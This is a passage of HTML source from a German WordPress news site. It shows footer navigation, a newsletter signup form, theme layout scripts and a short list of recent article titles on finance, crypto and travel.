  2647. <style>body .tdi_233 ul{margin:2px 0}body .tdi_233 ul li{margin-bottom:12px}body .tdi_233 ul li:last-child{margin-bottom:0}body .tdi_233 a,body .tdi_233 .td-blm-sub-icon{color:#000000}body .tdi_233 li.current-menu-item>a,body .tdi_233 li.current-menu-ancestor>a,body .tdi_233 li.current-category-ancestor>a,body .tdi_233 li.current-page-ancestor>a,body .tdi_233 a:hover,body .tdi_233 li.current-menu-item>a>.td-blm-sub-icon,body .tdi_233 li.current-menu-ancestor>a>.td-blm-sub-icon,body .tdi_233 li.current-category-ancestor>a>.td-blm-sub-icon,body .tdi_233 li.current-page-ancestor>a>.td-blm-sub-icon,body .tdi_233 a:hover>.td-blm-sub-icon{color:#ec3535}body .tdi_233 li{font-family:Work Sans!important;font-size:15px!important;line-height:1.2!important;font-weight:600!important}@media (min-width:1019px) and (max-width:1140px){body .tdi_233 li{font-size:14px!important}}@media (min-width:768px) and (max-width:1018px){body .tdi_233 ul li{margin-bottom:10px}body .tdi_233 ul li:last-child{margin-bottom:0}body .tdi_233 li{font-size:13px!important}}@media (max-width:767px){body .tdi_233 ul li{margin-bottom:15px}body .tdi_233 ul li:last-child{margin-bottom:0}}</style><div class="td-block-title-wrap"></div><div id=tdi_233 class="td_block_inner td-fix-index"><div class="menu-td-demo-footer-menu-container"><ul id="menu-td-demo-footer-menu-2" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-1092"><a href="https://nachrichtenmorgen.de/ueber-uns/"><span class="td-blm-menu-item-txt">Über uns!</span></a></li>
  2648. <li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-1093"><a href="https://nachrichtenmorgen.de/kontakt/"><span class="td-blm-menu-item-txt">Kontakt</span></a></li>
  2649. <li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-1094"><a href="https://nachrichtenmorgen.de/datenschutzbestimmungen/"><span class="td-blm-menu-item-txt">Datenschutzbestimmungen</span></a></li>
  2650. <li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-3265"><a href="https://nachrichtenmorgen.de/impressum/"><span class="td-blm-menu-item-txt">Impressum</span></a></li>
  2651. </ul></div></div></div></div></div></div><div class="vc_column_inner tdi_235  wpb_column vc_column_container tdc-inner-column td-pb-span3">
  2652. <style scoped>.tdi_235{vertical-align:baseline}.tdi_235 .vc_column-inner>.wpb_wrapper,.tdi_235 .vc_column-inner>.wpb_wrapper .tdc-elements{display:block}.tdi_235 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}.tdi_235{width:28%!important}@media (max-width:767px){.tdi_235{margin-bottom:25px!important;width:100%!important}}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_column_title tdi_236 tdm-content-horiz-left td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_236" ><div class="td-block-row"><div class="td-block-span12 tdm-col">
  2653. <style>body .tdi_237 .tdm-title{color:#000000}.tdi_237 .tdm-title{font-family:Work Sans!important;font-size:24px!important;line-height:1!important;font-weight:700!important;letter-spacing:-1px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_237 .tdm-title{font-size:22px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_237 .tdm-title{font-size:20px!important}}</style><div class="tds-title tds-title1 td-fix-index tdi_237 "><h3 class="tdm-title tdm-title-sm">Das Neueste</h3></div></div></div></div><div class="td_block_wrap tds_leads tdi_238  td_block_template_1"  data-td-block-uid="tdi_238" >
  2654. <style>.tdi_238{margin-bottom:0px!important}</style>
  2655. <style>body .tdi_238 .tds-title{margin-bottom:18px}body .tdi_238 .tds-messages-success{border-radius:2px}body .tdi_238 .tds-email-bar{flex-direction:column}body .tdi_238 .tds-input-wrap{margin:0 0 5px}body .tdi_238 .tds-input-wrap+.tds-submit-btn{margin:5px 0 0}body .tdi_238 .tds-input{padding:15px 10px;border-width:1px;border-style:solid;border-radius:3px;font-family:Work Sans!important;font-size:14px!important;line-height:1.2!important;font-weight:500!important}body .tdi_238 .tds-unsubscribe-txt{text-align:left}body .tdi_238 i.tds-submit-btn-icon{font-size:19px}body .tdi_238 .tds-submit-btn-icon-svg{width:19px}body .tdi_238 .tds-submit-btn-icon{margin-left:5px;top:0px}body .tdi_238 .tds-submit-btn{border-radius:3px;justify-content:center;background-color:#000000;font-family:Work Sans!important;font-size:13px!important;line-height:1.2!important;font-weight:700!important;text-transform:uppercase!important}body .tdi_238 .tds-checkbox label{font-size:16px}body .tdi_238 .tds-submit-btn:hover{background-color:#ec3535}body .tdi_238 .tds-check-title{color:#000000;font-family:Work Sans!important;font-size:13px!important;line-height:1.2!important}body .tdi_238 .tds-check-title a{color:#ec3535}body .tdi_238 .tds-check-title a:hover{color:#c11f1f}body .tdi_238 .tds-title{font-family:Work Sans!important;font-size:24px!important;line-height:1!important;font-weight:700!important;letter-spacing:-1px!important}body .tdi_238 .tds-message{font-family:Work Sans!important;font-size:13px!important;line-height:1.4!important;font-weight:600!important}@media (min-width:1019px) and (max-width:1140px){body .tdi_238 .tds-title{margin-bottom:14px}body .tdi_238 .tds-info:not(:empty){margin:0 0 12px}body .tdi_238 .tds-input{padding:12px 8px;font-size:13px!important}body .tdi_238 i.tds-submit-btn-icon{font-size:17px}body .tdi_238 .tds-submit-btn-icon-svg{width:17px}body .tdi_238 .tds-submit-btn{padding:12px;font-size:12px!important}body .tdi_238 .tds-title{font-size:22px!important}body .tdi_238 .tds-check-title{font-size:12px!important}}@media (min-width:768px) and (max-width:1018px){body .tdi_238 .tds-title{margin-bottom:12px}body .tdi_238 .tds-messages{padding:6px 10px}body .tdi_238 .tds-input{padding:10px 6px;font-size:12px!important}body .tdi_238 i.tds-submit-btn-icon{font-size:15px}body .tdi_238 .tds-submit-btn-icon-svg{width:15px}body .tdi_238 .tds-submit-btn-icon{margin-left:3px}body .tdi_238 .tds-submit-btn{padding:10px;font-size:11px!important}body .tdi_238 .tds-title{font-size:20px!important}body .tdi_238 .tds-message{font-size:12px!important}body .tdi_238 .tds-check-title{font-size:11px!important}}@media (max-width:767px){}</style><div class="tds-block-inner td-fix-index"><h3 class="tds-title">Abonnieren</h3><div class="tds-info"></div><form class="tds-form tds-s-content tds-s-content-sm" action="" method="post" name=""><input type="hidden" name="list" value="49"><input type="hidden" name="double_opt_in" value=""><input type="url" name="rdr_url" value="https://nachrichtenmorgen.de/" style="display: none;"><div class="tds-email-bar"><div class="tds-input-wrap"><input class="tds-input" type="email" name="email" aria-label="email" placeholder="E-Mail-Addresse" required></div><button class="tds-submit-btn" type="submit" name="tds-subscribe">ich möchte rein<i class="tds-submit-btn-icon tdc-font-tdmp tdc-font-tdmp-arrow-right"></i></button></div><div class="tds-checkbox"><input id="pp_checkbox_tdi_238" class="" name="" value="Y" type="checkbox"><label class="checkbox subfield" for="pp_checkbox_tdi_238"><span class="tds-check"></span><span class="tds-check-title">Ich habe die gelesen und akzeptiere sie <a href="https://nachrichtenmorgen.de/datenschutzbestimmungen/">Datenschutz-Bestimmungen</a>.</span></label></div></form></div></div></div></div></div><div class="vc_column_inner tdi_240  wpb_column vc_column_container tdc-inner-column td-pb-span3">
  2656. <style scoped>.tdi_240{vertical-align:baseline}.tdi_240 .vc_column-inner>.wpb_wrapper,.tdi_240 .vc_column-inner>.wpb_wrapper .tdc-elements{display:block}.tdi_240 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}.tdi_240{padding-top:10px!important;width:28%!important}@media (max-width:767px){.tdi_240{width:100%!important}}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="td_block_wrap td_flex_block_1 tdi_241 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_241" >
  2657. <style>.tdi_241{margin-bottom:0px!important}</style>
  2658. <style>.tdi_241 .entry-thumb{background-position:center 50%}.tdi_241 .td-image-container{display:none}.tdi_241 .entry-thumb{background-image:none!important}body .tdi_241 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_241 .td-module-meta-info{padding:0px;border-color:#eaeaea}.tdi_241 .td_module_wrap{padding-left:0px;padding-right:0px;padding-bottom:6px;margin-bottom:6px}.tdi_241 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_241 .td-module-container:before{bottom:-6px;border-color:#eaeaea}.tdi_241 .td-module-container{border-color:#eaeaea!important}.tdi_241 .td-post-vid-time{display:block}.tdi_241 .td-post-category{margin:0 3px 0 0;padding:2px 0;background-color:rgba(255,255,255,0);color:#000000;border-width:0px;border-style:solid;border-color:#aaa;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:600!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_241 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:50%}.tdi_241 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_241 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_241 .td-read-more{display:none}.tdi_241 .td-author-date{display:inline}.tdi_241 .td-post-author-name{display:none}.tdi_241 .entry-review-stars{display:none}.tdi_241 .td-icon-star,.tdi_241 .td-icon-star-empty,.tdi_241 .td-icon-star-half{font-size:15px}.tdi_241 .td-module-comments{display:none}.tdi_241 .td_module_wrap:nth-last-child(1){margin-bottom:0;padding-bottom:0}.tdi_241 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none}.tdi_241 .td-post-category:hover{background-color:rgba(255,255,255,0)!important;color:#ec3535}.tdi_241 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_241 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_241 .td-post-date,.tdi_241 .td-post-author-name span{color:#000000}.tdi_241 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_241 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_241 .entry-title{margin:0 0 8px 0;font-family:Work Sans!important;font-size:15px!important;line-height:1.2!important;font-weight:600!important}.tdi_241 .td-editor-date,.tdi_241 .td-editor-date .td-post-author-name a,.tdi_241 .td-editor-date .entry-date,.tdi_241 .td-module-comments a{font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;letter-spacing:-0.5px!important}html:not([class*='ie']) .tdi_241 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_241 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_241 .td-image-container{display:none}.tdi_241 .td_module_wrap{padding-bottom:5px;margin-bottom:5px;padding-bottom:5px!important;margin-bottom:5px!important}.tdi_241 .td-module-container:before{bottom:-5px}.tdi_241 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_241 .td_module_wrap .td-module-container:before{display:block!important}.tdi_241 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_241 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_241 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_241 .entry-title{margin:0 0 6px 0;font-size:14px!important}@media (min-width:768px){.tdi_241 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_241 .td-image-container{display:none}.tdi_241 .td_module_wrap{padding-bottom:3px;margin-bottom:3px;padding-bottom:3px!important;margin-bottom:3px!important}.tdi_241 .td-module-container:before{bottom:-3px}.tdi_241 .td-post-category:not(.td-post-extra-category){display:none}.tdi_241 .td-author-date{display:none}.tdi_241 .td-post-date,.tdi_241 .td-post-author-name span{display:none}.tdi_241 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_241 .td_module_wrap .td-module-container:before{display:block!important}.tdi_241 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_241 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_241 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_241 .entry-title{margin:0 0 4px 0;font-size:13px!important}.tdi_241 .td-editor-date,.tdi_241 .td-editor-date .td-post-author-name a,.tdi_241 .td-editor-date .entry-date,.tdi_241 .td-module-comments a{font-size:10px!important}@media (min-width:768px){.tdi_241 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_241 .td-image-wrap{padding-bottom:110%}.tdi_241 .td-image-container{flex:0 0 30%;width:30%;display:none}.ie10 .tdi_241 .td-image-container,.ie11 .tdi_241 .td-image-container{flex:0 0 auto}.tdi_241 .td_module_wrap{padding-bottom:6px;margin-bottom:6px;padding-bottom:6px!important;margin-bottom:6px!important}.tdi_241 .td-module-container:before{bottom:-6px}.tdi_241 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_241 .td_module_wrap .td-module-container:before{display:block!important}.tdi_241 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_241 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_241 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_241 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_241 = new tdBlock();
  2659. block_tdi_241.id = "tdi_241";
  2660. block_tdi_241.atts = '{"modules_on_row":"","image_size":"","image_floated":"hidden","image_width":"eyJwaG9uZSI6IjMwIn0=","image_height":"eyJwaG9uZSI6IjExMCJ9","show_btn":"none","show_excerpt":"eyJwaG9uZSI6Im5vbmUiLCJhbGwiOiJub25lIn0=","show_com":"eyJwaG9uZSI6Im5vbmUiLCJhbGwiOiJub25lIn0=","show_author":"none","show_cat":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","meta_padding":"0","f_title_font_size":"eyJhbGwiOiIxNSIsInBvcnRyYWl0IjoiMTMiLCJsYW5kc2NhcGUiOiIxNCJ9","f_title_font_line_height":"1.2","f_title_font_weight":"600","all_modules_space":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjEwIiwicG9ydHJhaXQiOiI2In0=","category_id":"","show_date":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","art_excerpt":"0","show_review":"none","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sInBvcnRyYWl0Ijp7ImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsiZGlzcGxheSI6IiJ9LCJwaG9uZV9tYXhfd2lkdGgiOjc2NywibGFuZHNjYXBlIjp7ImRpc3BsYXkiOiIifSwibGFuZHNjYXBlX21heF93aWR0aCI6MTE0MCwibGFuZHNjYXBlX21pbl93aWR0aCI6MTAxOX0=","f_title_font_family":"653","mc1_el":"10","title_txt_hover":"#f43f3f","title_txt":"#000000","art_title":"eyJsYW5kc2NhcGUiOiIwIDAgNnB4IDAiLCJwb3J0cmFpdCI6IjAgMCA0cHggMCIsImFsbCI6IjAgMCA4cHggMCJ9","modules_gap":"0","f_meta_font_size":"eyJhbGwiOiIxMiIsInBvcnRyYWl0IjoiMTAifQ==","f_meta_font_line_height":"1","f_meta_font_weight":"500","f_meta_font_family":"653","modules_cat_border":"0","modules_category_padding":"2px 0","f_cat_font_family":"653","f_cat_font_transform":"uppercase","f_cat_font_size":"12","f_cat_font_weight":"600","f_cat_font_line_height":"1","f_meta_font_spacing":"-0.5","f_cat_font_spacing":"-0.5","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","cat_txt":"#000000","cat_txt_hover":"#ec3535","modules_category_margin":"0 3px 0 0","modules_category":"","f_title_font_transform":"","sort":"","excl_padd":"3px 5px","f_excl_font_family":"653","f_excl_font_transform":"uppercase","f_excl_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_weight":"500","f_excl_font_line_height":"1","f_excl_font_spacing":"-0.5","excl_bg":"#ec3535","excl_bg_h":"#ec3535","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_radius":"2","excl_margin":"-4px 5px 0 0","limit":"3","date_txt":"#000000","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","post_ids":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","offset":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","container_width":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_":"","meta_info_align":"","meta_info_horiz":"layout-default","meta_width":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_style":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category_radius":"0","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","review_space":"","review_size":"2.5","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","show_audio":"block","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_font_transform":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_weight":"","f_btn_font_transform":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_bg":"","btn_bg_hover":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_h_bg":"","pag_border":"","pag_h_border":"","ajax_pagination":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_241","tdc_css_class":"tdi_241","tdc_css_class_style":"tdi_241_rand_style"}';
  2661. block_tdi_241.td_column_number = "1";
  2662. block_tdi_241.block_type = "td_flex_block_1";
  2663. block_tdi_241.post_count = "3";
  2664. block_tdi_241.found_posts = "3784";
  2665. block_tdi_241.header_color = "";
  2666. block_tdi_241.ajax_pagination_infinite_stop = "";
  2667. block_tdi_241.max_num_pages = "1262";
  2668. tdBlocksArray.push(block_tdi_241);
  2669. </script><div class="td-block-title-wrap"></div><div id=tdi_241 class="td_block_inner td-mc1-wrap">
  2670.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2671.            <div class="td-module-container td-category-pos-">
  2672.                                    <div class="td-image-container">
  2673.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/finanzeno-net/"  rel="bookmark" class="td-image-wrap " title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Finanzeno.net-Schafft-Erstklassige-Online-Finanzplattformen-696x392.jpg"  ></span></a></div>                                                                    </div>
  2674.                
  2675.                <div class="td-module-meta-info">
  2676.                                        
  2677.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/finanzeno-net/"  rel="bookmark" title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen">Finanzeno.net Schafft Erstklassige Online-Finanzplattformen</a></h3>
  2678.                    
  2679.                                            <div class="td-editor-date">
  2680.                                                        <a href="https://nachrichtenmorgen.de/category/finanzen-und-vertrag/" class="td-post-category">Finanzen und Vertrag</a>
  2681.                                                            <span class="td-author-date">
  2682.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-06T17:15:57+02:00" >Mai 6, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/finanzeno-net/#respond">0</a></span>                                </span>
  2683.                                                    </div>
  2684.                    
  2685.                    <div class="td-excerpt">Finanzeno.net, ein führender Name im Finanzdienstleistungssektor, setzt weiterhin hohe...</div>
  2686.                    
  2687.                                    </div>
  2688.            </div>
  2689.        </div>
  2690.  
  2691.        
  2692.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2693.            <div class="td-module-container td-category-pos-">
  2694.                                    <div class="td-image-container">
  2695.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/"  rel="bookmark" class="td-image-wrap " title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt." ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Die-letzten-Jahre-waren-fuer-Krypto-Investoren-und-Krypto-Boersenbesitzer-ein-wilder-Ritt.jpg"  ></span></a></div>                                                                    </div>
  2696.                
  2697.                <div class="td-module-meta-info">
  2698.                                        
  2699.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/"  rel="bookmark" title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.">Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.</a></h3>
  2700.                    
  2701.                                            <div class="td-editor-date">
  2702.                                                        <a href="https://nachrichtenmorgen.de/category/krypto/" class="td-post-category">Krypto</a>
  2703.                                                            <span class="td-author-date">
  2704.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-04T15:49:51+02:00" >Mai 4, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/#respond">0</a></span>                                </span>
  2705.                                                    </div>
  2706.                    
  2707.                    <div class="td-excerpt">5 Krypto-Trends, denen man im Jahr 2024 und darüber...</div>
  2708.                    
  2709.                                    </div>
  2710.            </div>
  2711.        </div>
  2712.  
  2713.        
  2714.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2715.            <div class="td-module-container td-category-pos-">
  2716.                                    <div class="td-image-container">
  2717.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/"  rel="bookmark" class="td-image-wrap " title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-10-696x391.jpg"  ></span></a></div>                                                                    </div>
  2718.                
  2719.                <div class="td-module-meta-info">
  2720.                                        
  2721.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/"  rel="bookmark" title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste">Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste</a></h3>
  2722.                    
  2723.                                            <div class="td-editor-date">
  2724.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  2725.                                                            <span class="td-author-date">
  2726.                                                                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-02T10:51:42+02:00" >Mai 2, 2024</time></span>                                                                        <span class="td-module-comments"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/#respond">0</a></span>                                </span>
  2727.                                                    </div>
  2728.                    
  2729.                    <div class="td-excerpt">Carmel-by-the-Sea, oft einfach als Carmel bekannt, ist ein malerisches...</div>
  2730.                    
  2731.                                    </div>
  2732.            </div>
  2733.        </div>
  2734.  
  2735.        </div></div></div></div></div></div><div class="vc_row_inner tdi_243  vc_row vc_inner wpb_row td-pb-row" >
  2736. <style scoped>.tdi_243{position:relative!important;top:0;transform:none;-webkit-transform:none}.tdi_243,.tdi_243 .tdc-inner-columns{display:block}.tdi_243 .tdc-inner-columns{width:100%}.tdi_243{margin-right:0px!important;margin-left:0px!important;padding-top:20px!important;padding-bottom:20px!important;border-color:#dddddd!important;border-style:solid!important;border-width:1px 0px 0px 0px!important}.tdi_243 .td_block_wrap{text-align:left}</style><div class="vc_column_inner tdi_245  wpb_column vc_column_container tdc-inner-column td-pb-span12">
  2737. <style scoped>.tdi_245{vertical-align:baseline}.tdi_245 .vc_column-inner>.wpb_wrapper,.tdi_245 .vc_column-inner>.wpb_wrapper .tdc-elements{display:block}.tdi_245 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_246 td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_246" >
  2738. <style>@media (min-width:1019px) and (max-width:1140px){.tdi_246{margin-bottom:20px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_246{margin-bottom:15px!important}}</style>
